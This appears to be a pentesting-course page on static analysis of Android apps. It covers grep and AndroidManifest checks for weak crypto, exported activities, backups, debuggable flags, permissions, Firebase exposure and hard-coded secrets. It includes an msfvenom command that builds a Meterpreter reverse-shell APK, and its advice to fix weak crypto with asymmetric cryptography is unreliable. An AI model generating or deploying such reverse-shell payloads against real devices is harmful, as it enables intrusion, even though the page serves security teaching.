search

Static analysis

Is done without running the program, what are we going to identify in this basic room?

  • Weak or improper cryptography use

  • Exported Preference Activities

  • Apps which enable backups

  • Apps which are debuggable

  • App Permissions.

  • Firebase Instance(s)

  • Sensitive data in the code

hashtag
Weak or improper cryptography use

Incorrect uses of encryption algorithm may result in sensitive data exposure, key leakage, broken authentication, insecure session and spoofing attack.

Example: For Java implementation, the following API is related to encryption. Review the parameters of the encryption implementation.

IvParameterSpec iv = new IvParameterSpec(initVector.getBytes("UTF-8"));

SecretKeySpec skeySpec = new SecretKeySpec(key.getBytes("UTF-8"), "AES");

How to search this when I have the source code of the application? there is a super advanced tool and wonderful called grep.

grep -r "SecretKeySpec" *

grep -rli "aes" *

grep -rli "iv"

Open the file with you favorite editor of text. Gedit/Vim/subl, etc… use this for revolse a puzzle in my ctf "LaxCTF".

in real life:

Solution: Use asymmetric cryptography.

hashtag
Exported Preference Activities

As we know, Android's activity component is application screen(s) and the action(s) that applied on that screen(s) when we use the application. When as activity is found to be shared with other apps on the device therefore leaving it accessible to any other application on the device.

Okay, exploit this in dynamic analysis... How identify the activity is exported?

With your favorite editor of text. Gedit/Vim/subl, etc… open the AndroidManifest.xml or use cat and grep.

cat AndroidManifest.xml | grep "activity" --color

hashtag
Apps which enable backups

This is considered a security issue because people could backup your app via ADB and then get private data of your app into their PC.

  1. Shared preference.

  2. directory returned by getFilesDir().

  3. getDataBase(path) also includes files created by SQLiteOpenHelper.

  4. files in directories created with getDir(Sring, int).

  5. files on external storage returned by getExternalFilesDir (String type).

How identify this?

With your favorite editor of text. Gedit/Vim/subl, etc… open the AndroidManifest.xml or use cat and grep.

cat AndroidManifest.xml | grep "android:allowBackup" --color

Real scenario? you use your mind for this exercice :3.

Solution: android:allowBackup="false"

hashtag
Apps which are debuggable

Debugging was enabled on the app which makes it easier for reverse engineers to hook a debugger to it. This allows dumping a stack trace and accessing debugging helper classes.

How identify this?

With your favorite editor of text. Gedit/Vim/subl, etc… open the AndroidManifest.xml or use cat and grep.

cat AndroidManifest.xml | grep "android:debuggable" --color

hashtag
App Permissions

System permissions are divided into two groups: “normal” and “dangerous.” Normal permission groups are allowed by default, because they don’t pose a risk to your privacy. (e.g., Android allows apps to access the Internet without your permission.) Dangerous permission groups, however, can give apps access to things like your calling history, private messages, location, camera, microphone, and more. Therefore, Android will always ask you to approve dangerous permissions.

In earlier versions of Android, accepting potentially dangerous permission groups was an all-or-nothing affair. You either allowed all permissions an app needed to function — before installation — or you declined them all, which meant you couldn’t install the app.

I going to analyze the permissions of an apk app generated by metasploit.

msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 R > /root/tryhackme.apk

Okay, HOW?

With your favorite editor of text. Gedit/Vim/subl, etc… open the AndroidManifest.xml or use cat and grep.

hashtag
Firebase Instance(s)

Last year, security researchers have discovered unprotected Firebase databasesarrow-up-right of thousands of iOS and Android mobile applications that are exposing over 100 million data records, including plain text passwords, user IDs, location, and in some cases, financial financial records such as banking and cryptocurrency transactions.

Google's Firebase service is one of the most popular back-end development platforms for mobile and web applications that offers developers a cloud-based database, which stores data in JSON format and synced it in the real-time with all connected clients.

How identify this?

FireBase Scannerarrow-up-right, The scripts helps security analsts to identify misconfigured firebase instances.

git clone https://github.com/shivsahni/FireBaseScanner

python FireBaseScanner.py -p /path/apk

hashtag
Sensitive data in the code

Users, passwords, internal IP and more ...

With your favorite editor of text, Gedit/Vim/subl, etc…, grep or GUI decompiler back to reversing and experiment with your favorite tool.

In the real life exist very bad practice of programing! how example:

hashtag
How to automatize this process?

It is very entertaining to do this manually, but in a real pentest the time is not our friend. Let see some static analysis frameworks.

PreviousReversingNextStatic Analysis Frameworks

Last updated